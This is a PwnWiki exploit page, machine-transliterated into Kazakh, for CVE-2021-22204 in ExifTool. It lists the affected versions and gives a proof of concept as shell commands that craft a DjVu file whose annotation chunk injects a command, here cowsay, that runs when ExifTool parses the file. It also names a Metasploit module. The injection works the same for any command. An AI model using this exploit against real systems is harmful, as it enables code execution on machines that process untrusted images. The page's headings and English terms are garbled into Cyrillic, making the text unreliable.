ЦВЕ-2021-22204 ЕхіфТоол кодты ерікті түрде орындау осалдығы

From PwnWiki
This page is a translated version of the page CVE-2021-22204 ExifTool任意代碼執行漏洞 and the translation is 100% complete.
Отһер лангұагес:
Афрікаанс • ‎Баһаса Ындонесіа • ‎Баһаса Мелаю • ‎Цһінесе • ‎Деұтсцһ • ‎Енглісһ • ‎Фрyск • ‎Гаеілге • ‎Һаұса • ‎Кіняруанда • ‎Креyòл аyісен • ‎Лëтзебұергесцһ • ‎Малагасy • ‎Недерландс • ‎Тіếнг Віệт • ‎Түркче • ‎азəрбаyцанца • ‎босанскі • ‎цаталà • ‎цорсұ • ‎данск • ‎еесті • ‎еспаңол • ‎еұскара • ‎франчаіс • ‎галего • ‎һрватскі • ‎італіано • ‎латвіеšұ • ‎ліетұвіų • ‎магяр • ‎полскі • ‎портұгұêс • ‎ромâнă • ‎сһқіп • ‎сұомі • ‎свенска • ‎íсленска • ‎čеšтіна • ‎Ελληνικά • ‎Кыргызча • ‎беларуская • ‎български • ‎монгол • ‎русский • ‎татарча • ‎тоҷикӣ • ‎українська • ‎қазақша • ‎հայերեն • ‎עברית • ‎العربية • ‎فارسی • ‎پښتو • ‎کوردی • ‎বাংলা • ‎ਪੰਜਾਬੀ • ‎ગુજરાતી • ‎ଓଡ଼ିଆ • ‎ಕನ್ನಡ • ‎မြန်မာဘာသာ • ‎ქართული • ‎አማርኛ • ‎ភាសាខ្មែរ • ‎中文(繁體)‎ • ‎日本語 • ‎한국어

Зардап шеккен нұсқа

ЕхіфТоол 7.44 то 12.23


ПОЦ

  $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

-- 
Jakub Wilk

Метасплоіт

https://github.com/rapid7/metasploit-framework/pull/15185 

exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-22204_ExifTool任意代碼執行漏洞/kk&oldid=3237"